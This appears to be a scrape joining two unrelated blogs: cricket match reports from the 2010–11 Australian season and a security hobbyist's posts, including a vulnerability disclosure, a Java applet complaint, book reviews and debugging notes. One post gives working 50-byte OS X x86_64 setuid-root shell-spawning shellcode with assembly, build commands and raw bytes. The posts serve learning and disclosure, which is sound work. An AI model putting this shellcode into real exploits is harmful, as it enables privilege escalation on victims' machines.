Adelaide – Second Ashes Test

Day 1 – 3rd December 2010

The first day of the Second Ashes Test was another tough day at the office for the Australianbatsmen. Amazingly three wickets were down within 15 minutes, on what should have been a batsmen’s wicket. Katich was run out without facing a single ball. Both Katich and Watson seemed indecisive over a dangerous run and Trott struck with a direct hit. Ricky Ponting was then dismissed off of the first ball he faced, caught by Swann off the bowling of AndersonClarke was dismissed for two by the same pairing.

Mike HusseyAustralia‘s saviour from the First Test, came to the crease. He and Watson managed to take the score to 93 at lunch, without further loss. But Watson was dismissed almost straight after lunch for the addition of only 3 runs, caught by Pietersen, once again off of Anderson‘s bowling. Hussey was joined by his Western Australian team mate Marcus North and the two of them batted well together adding 60 runs. North seemed to be seeing the ball well, but still edged a ball to Priorfor Finn‘s first wicket of the match. Haddin, the last of Australia’s recognised batsmen, came to the crease and together with Hussey, added another 50 runs, before Hussey was caught by  Collingwoodoff of the spinner Swann, seven runs short of his 13th Test century.

As expected the Australian tail did not wag. Haddin hung around to be the last man dismissed for 56. But Harris, Doherty, Siddle and Bolinger managed only 9 runs between them. Australia were all out for 245. Anderson was the pick of the English bowlers, picking up 4 for 51 off of 19 overs. Swann claimed two wickets and Broad and Finn one a piece.

England had to face one over before the close of play, which they negotiated without a problem, for the addition of a single leg bye.

On this performance there will be more calls for changes in the Australian line up. It should be Ponting and Clarke that are looked at, but you can bet your life it will be Marcus North the press call for to be dropped.

Things are not looking great for Australia. This attack does not look strong to me and unless the batsmen can seriously turn things around in the second innings, this could be their first loss of the series.

First Ashes Test Day Four

England took command of the first session of day four, managing to get through the session without loss and raising the overall run rate to just under three an over, after yesterdays very slow start. Australia only had one genuine chance of a wicket, when Strauss was dropped by the normallay safe hands of Mitchell Johnson. Both Strauss and Cook made half centuries, finishing the morning on 79 and 51 at 135 for none.

After lunch things continued England‘s way with centuries for both Strauss and CookStraussmanaged 10 more runs before being stumped by Haddin off the bowling of  Marcus North. But that was the only wicket of the day, with Cook remaining unbeaten on 132. He was joined by Trott on the dismissal of Strauss and he was still there on 54 when play closed early due to bad light, with England on 309 for 1 for a lead of 88.

With only one day remaining a draw now looks the most likely result. Which could be bad news for Australia as this is how the last Ashes series started in Cardiff last year. Australia dominated that match only to be held to a draw.

First Ashes Test Brisbane 2010

The first two days of the first Ashes test of 2010 saw honours fairly even, with a slight edge to Australia. On the first day good innings from CookPietersen and Bell were quickly overshadowed by Peter Siddle on his 26th birthday. Siddle finished with figures of 6 for 54 off of 16 overs, which was of course crowned by his hat trick of Cook, Prior and BroadSiddle‘s bowling can not be praised highly enough, with the debutant Xavier Doherty the only other bowler picking up more than one wicket. Doherty bowled well in his first test match, deservedly picking up the wickets of England‘s highest scorer Ian Bell and number 10 Jimmy AndersonAustralia safely saw off the day’s final overs finishng with 25 for no wickets.

Day two saw Watson and Katich both make good starts scoring 36 and 50 respectively, but Pontingand Clarke went cheaply, scoring only 10 and 9. But cometh the hour cometh the man. Mike Husseymarched to the crease under a huge cloud created by eastern states commentators and critics calling for him to be dropped. He came in with Australia starting to flounder on 3 for 100, then Clarke and North went quite quickly, to leave them on 5 for 143, still 117 behind England‘s first innings score. Hussey and Haddin saw off the rest of the days bowling, finishing the day on 81 and 22 not out with the score on 220 for 5.

Day three saw the partnership consolidate and get through a tough period of bowling from England. They then started to make hay, with both players scoring centuries and Australia taking a grip on the contest. They batted well into the third session of the day, with Haddin eventualy being dismissed for 136 after bringing up his century with a 6 straight down the field. Hussey fell agonisingly short of a double century, but with his highest test score of 195. He batted for eight and a quarter hours, scoring 26 fours and a six, so hopefully that will silence his critics for the rest of the series. The debutant Doherty scored a useful 16 being the last man dismissed by Finn, the pick of the England bowlers who finished with 6 for 125 off 33.4 overs. Australia were all out for 481 leading England by 221.

Strauss was almost dismissed off the first ball of England‘s second innings, leaving a rising ball from HilfenhausAleem Dar gave him not out. Australia appealed the decision and he was proved correct with the ball going over the wicket. England finished the day without loss, but did not score many runs, in what now appears to be a battle to save the match, ending with 19 for none.

Australia Lose first ODI of the season

Sri Lanka 243-9 (44.2 ovs) beat Australia 239-8 (50 ovs) by one wicket

Australia managed to snatch a defeat from the jaws of a victory in the first one day international of this cricket season, at the MCGAustralia made 239-8 batting first. There were some disappointments but Haddin made 49 and Mike Hussey restored some respect to the score, making 71 not out. Hussey took to the field at 85 for 2 in the 17th over and batted through to the close. But he never had any partner that accompanied him for very long. He said at the close of the innings that he thought it was a below par score.

The Sri Lanka innings started well for Australia with Tharanga and Dilshan being dismissed in single figures. Sangakakkara and Jayawardene put on 54 for the third wicket before a collapse that left Sri Lanka reeling on 107 for 8. Spinner Xavier Doherty took 4 wickets on his debut, but then the wheels fell off. Angelo Mathews and Malinga created a new 9th wicket record for Sri Lankascoring 132 runs. Malinga was only dismissed when the scores were even.

Much is being said about Australia forgetting how to win and things are looking grim for the upcoming Ashes series. We know that the days of the Invincibles are over, where someone would always stand up when the chips were down. Australia no longer has those exceptionally talented players throughout the team. But they are still a solid side and hopefully will show their pride when they face the old enemy. But it is going to be a tough uphill battle on current form.

The answer to Australia’s problems is not to drop Mike Hussey as has been suggested in some quarters. This is mainly due to him being from WA. If he was from the Eastern States nothing much would be said of his recent form. But as he is West Australian his position in the team is always under threat, according to the Eastern States press. Fortunately I believe that he has more support with the selectors and certainly from the Captain. Hussey is always likely to pull out a match saving innings like he did today. Well it would have saved the match, if the bowlers could have managed the last two wickets for anything less than 133 runs, sounds more than achievable to me.

Ricky Ponting missed the match due to a family bereavement, but will be available for the Sydneygame on Friday. He has not played a ODI since the series against England finished in July. Let’s hope he can bring a change of fortunes, one is urgently required.

Commonwealth Games Wind Up

Australia tops the Medal table

So the Commonwealth Games is all over for another 4 years. Australia led the event across the board, ending up clear leaders of the medal table by a country mile. In the final days Australia won both the Men’s and Women’s Hockey Finals, but New Zealand took some comfort in beating Australia in the finals of the Rugby 7s and Netball.

One of the lesser lights of Commonwealth sport, Singapore, almost made a clean sweep of Table Tennis, picking up 6 of the 7 Golds available. Losing only the Men’s doubles final to India.

Kenya did the double in the Marathon, picking up gold in both the Men’s and Women’s events. Confirming their domination of distance running, picking up the vast majority of medals from 800 metres to the Marathon. How long will it be before we see Kenya winning the sprint events too?

India succeeded in pipping England at the post for second place in the medals table. They picked up their 38th Gold medal of the games in Badminton, where England lost 3 finals to pick up silver. England only needed to pick up one more Gold to beat India into second place, because of their superior number of Silver medals.

On Wednesday night at the Boxing finals Indian fans were cheering any fighter that was up against an Englishman, hoping to secure that second place.

It would be a very good week to be an Indian sports fan I would imagine, having beaten Australia in the second test at Bangalore on Wednesday to secure the series 2-0. Sachin Tendulkar picking up a double century in the first and 53 not out in the second innings. He of course hit the winning runs too. Australia are really going to have to put some work in before the Ashes series if they do not want to be humbled on home soil. The first Ashes test begins on 24th November

By Max Power

India v Australia Second Test, Bangalore, day two

Australia 478 v India 128-2

The second day of the second test was most notable for Marcus North scoring his 5th test century and hopefully relieving some of the pressure on him to retain his position. North finished on 128hitting 17 fours and a six. Ricky Ponting (77) and Tim Payne (59) had also chipped in with half centuries in Australia‘s total of 478. The best of the Indian bowlers was spinner Harbhajan Singh, who took North’s wicket and finished with figures of 4-148.

Marcus North hits his highest test score and 5th test century

Sachin Tendulkar also achieved a landmark in being the first player to score 14,000 test runs. He needed only 27 runs to reach the target and finished the day on 44 not out, having hit 6 fours. Tendulkar came in after Sehawag was caught by Mitchell Johnson after scoring a rapid 30 off of 28 balls and Dravid was dismissed for a solitary run. Being caught at third slip by Marcus North off an edge from Mitchell JohnsonTendulkar and Vijay then batted until the close of play, scoring an unbeaten 90 in India‘s total of 128 for 2.

Sachin Tendulkar passed the milestone of 14,000 test runs in his unbeaten partnership with Vijay

T-Mobile 4G Hotspot Multiple Vulnerabilities


Create your own personal hotspot on the go with the T-Mobile 4G Mobile Hotspot—get high-speed Internet on up to five Wi-Fi devices, using a single mobile broadband connection.

Link to Product on T-Mobile’s Website


  • Reported to T-Mobile and ZTE on 4/14/12.
  • Received notification from T-Mobile on 4/17/12 that the vulnerabilities would be forwarded to their security team for review.
  • Received no meaningful response from ZTE.
  • No fixes provided, disclosure 2/21/13

Device: T-Mobile 4G Mobile Hotspot ZTE MF61

The access point broadcasts as ‘T-Mobile Broadband#’ where # changes per device.


My Plea to Oracle: Axe Java Applets

Hi Oracle,

We’ve got a bit of problem: applets.

You see, almost every recent security vulnerability and recent hack – Facebook, Apple, NYT – has been because of your support for applets.

Just to name a few, there’s CVE-2012-3213,CVE-2012-3342,CVE-2013-0351,CVE-2013-0409,CVE-2013-0419,CVE-2013-0423,CVE-2013-0424,CVE-2013-0425,CVE-2013-0426,CVE-2013-0427,CVE-2013-0428,CVE-2013-0429,CVE-2013-0432,CVE-2013-043,CVE-2013-0434,CVE-2013-0435,CVE-2013-0438,CVE-2013-0440,CVE-2013-0441,CVE-2013-0442,CVE-2013-0443,CVE-2013-0445,CVE-2013-0450,CVE-2013-1473,CVE-2013-1475,CVE-2013-1476,CVE-2013-1478,CVE-2013-1480,CVE-2013-1481,CVE-2013-1486,CVE-2013-1487,CVE-2013-1488.

I’ve been developing in Java for many years and I can attest that nobody uses applets anymore. It’s old outdated technology that needs to go away. It’s too heavy of a platform to deliver web applications. The future of web technology is light weight. The future is HTML5, Javascript, and CSS3.

We all make mistakes and nobody is going to blame you (except maybe the malware authors) for getting rid of applets.

Do it! Axe it!

Security Enthusiast and Java Developer
Dustin Schultz

Java Facepalm

It’s been a while since I’ve blogged but I couldn’t resist with the latest Java vulnerability. I saw the proof of concept code posted by jduck last night (here) and thought this looks like normal Java code to me (I develop in Java at my day job). Well it turns out…this is normal Java code!


50 Byte x86_64 OS X setuid execve Null Free Shellcode

More smaller shellcode, this time, tested and verified working on OSX 10.7.


 * Name: setuid_shell_x86_64
 * Qualities: Null-Free
 * Platforms: Mac OS X 10.7 Intel x86_64
 *  Created on: Apr 12, 2012
 *      Author: Dustin Schultz -
char shellcode[] =


; File: setuid_shell_x86_64.asm
; Author: Dustin Schultz -

section .text
global start

mov r8b, 0x02                   ; Unix class system calls = 2
shl r8, 24                      ; shift left 24 to the upper order bits
or r8, 0x17                     ; setuid = 23, or with class = 0x2000017
xor edi, edi                    ; zero out edi, uid = 0
mov rax, r8                     ; syscall number in rax
; mov rax, 0x2000017
syscall                         ; invoke kernel
add r8, 0x24                    ; 0x24+r8=0x200003b
mov rax, r8                     ; syscall number in rax
xor rdx, rdx                    ; zero out rdx, null terminator
; mov rax, 0x200003b
mov rdi, 0x68732f2f6e69622f     ; /bin//sh in hex
push rdx                        ; push backwards, null terminator
push rdi                        ; address of /bin//sh
mov rdi, rsp                    ; null terminated /bin/sh pointer
push rdx                        ; push backwards, null terminator
push rdi                        ; address of /bin//sh
mov rsi, rsp                    ; null terminated /bin/sh pointer
syscall                         ; invoke kernel

To test:

dustin@sholtz:~/$ nasm -f macho64 shell.s 
dustin@sholtz:~/$ ld -static -arch x86_64 shell.o
dustin@sholtz:~/$ ./a.out

Bytes from otool:

dustin@sholtz:~/$ otool -t a.out 
(__TEXT,__text) section
0000000100000f86 41 b0 02 49 c1 e0 18 49 83 c8 17 31 ff 4c 89 c0 
0000000100000f96 0f 05 49 83 c0 24 4c 89 c0 48 31 d2 48 bf 2f 62 
0000000100000fa6 69 6e 2f 2f 73 68 52 57 48 89 e7 52 57 48 89 e6 
0000000100000fb6 0f 05 


Execve Syscall on OSX 10.7

I’m getting some strange behavior with shellcode that used to work on OS X 10.6. I noticed that if I don’t link with the “-static” option, I get a segfault.

; File: shell.s
; Author: Dustin Schultz -

section .text
global start

xor rdx, rdx
mov eax, 0x200003b
mov rdi, 0x68732f2f6e69622f
push rsi
push rdi
mov rdi, rsp

With static:

dustin@sholtz:~$ nasm -f macho64 shell.s 
dustin@sholtz:~$ ld -static -arch x86_64 shell.o
dustin@sholtz:~$ ./a.out 
dustin@sholtz:/Users/dustin$ exit

Without static

dustin@sholtz:~$ nasm -f macho64 shell.s 
dustin@sholtz:~$ ld -arch x86_64 shell.o
dustin@sholtz:~$ ./a.out 
Segmentation fault: 11

otool has the same output:

dustin@sholtz:~$ otool -tv static 
(__TEXT,__text) section
0000000100000fe7	xorq	%rdx,%rdx
0000000100000fea	movl	$0x0200003b,%eax
0000000100000fef	movq	$0x68732f2f6e69622f,%rdi
0000000100000ff9	pushq	%rsi
0000000100000ffa	pushq	%rdi
0000000100000ffb	movq	%rsp,%rdi
0000000100000ffe	syscall
dustin@sholtz:~$ otool -tv non-static 
(__TEXT,__text) section
0000000100000f9f	xorq	%rdx,%rdx
0000000100000fa2	movl	$0x0200003b,%eax
0000000100000fa7	movq	$0x68732f2f6e69622f,%rdi
0000000100000fb1	pushq	%rsi
0000000100000fb2	pushq	%rdi
0000000100000fb3	movq	%rsp,%rdi
0000000100000fb6	syscall

The headers on the files look way different but I’m not sure exactly what is causing the issue. For instance, the non-static version has several more Load commands like LC_LOAD_DYLINKER (which is expected).

As pointed out in the comments, I was not initializing rsi correctly! Thanks for pointing that out. The fix was to add this before the last syscall:

push rdx
push rdi
mov rsi, rsp

Finding the syscall implementations in OS X

This is mainly just a little note for myself. Sometimes when I’m writing shellcode, I’m interested in how OS X implements the syscalls internally. It’s easy to find out with a command like this:

dustin@sholtz:~$ otool -tv /usr/lib/system/libsystem_kernel.dylib | grep -A10 execve
0000000000016898	movl	$0x0200017c,%eax
000000000001689d	movq	%rcx,%r10
00000000000168a0	syscall
00000000000168a2	jae	0x000168a9
00000000000168a4	jmp	0x00017ffc
00000000000168a9	ret
00000000000168aa	nop
00000000000168ab	nop
00000000000168ac	movl	$0x02000184,%eax
00000000000173e0	movl	$0x0200003b,%eax
00000000000173e5	movq	%rcx,%r10
00000000000173e8	syscall
00000000000173ea	jae	0x000173f1
00000000000173ec	jmp	0x00017ffc
00000000000173f1	ret
00000000000173f2	nop
00000000000173f3	nop
00000000000173f4	movl	$0x0200000d,%eax

This will find the execve syscall implementation. I still haven’t figured out where the parameters are getting setup but this is definitely where the syscall number is getting moved into rax. It moves whatever was in rcx because it gets smashed by the kernel when syscall is invoked.

Book Review: Practical Malware Analysis

I’ve been dying to get this review out for a while now. There’s so much good and deep content in this book, that reading it on nights after work and weekends took longer than expected! I’ll tell you now that if you’re into computers and computer security, this book won’t let you down.This book is like having your very own personal malware analysis teacher without the expensive training costs.

About the Book

The book material is exhaustingly complete with 21 chapters + appendices covering everything from static analysis, environment setup, x86 assembly to anti-disassembly and anti-virtual machine practices. Total book content, minus lab solutions comes in at an enormous 475 pages (with lab solutions, 732 pages) . Let’s just say that you better be prepared to eat, breathe, and live malware analysis for quite some time. The skill level for the book is targeted at someone with experience in programming and security although an ambitious beginner should do fine. (more…)

Half way through Practical Malware Analysis

I’m about half way through Practical Malware Analysis and let me just say … this book is awesome! Quote me on this: I guarantee this book will go down in history as one of the best in its class. Look out for my full review!

Book Review: Hacking and Securing iOS Applications

About the Book

Hacking and Securing iOS Applications is a recently released book by Jonathan Zdziarski. This book is aimed to teach you how to

  • Compromise an iOS device
  • Steal the filesystem of an iOS device
  • Abuse the Objective-C runtime
  • Defeat iOS built in encryption
  • Protect your own applications

and much, much, more! The book comes in at just shy of 400 pages. Each chapter is broken into a specific topic and builds on previous chapters. However, there are a few chapters which are self contained and could be read without prior knowledge (e.g. Chapter 13 – Jailbreak Detection).

Audience, Skill Level, & Prereqs

This book is targeted at app developers and the how-does-ios-work-and-how-can-I-manipulate-it type person (I try not to use the term “Hacker”). Jonathan also uses the term tinkers – I like that one too!

Go to Top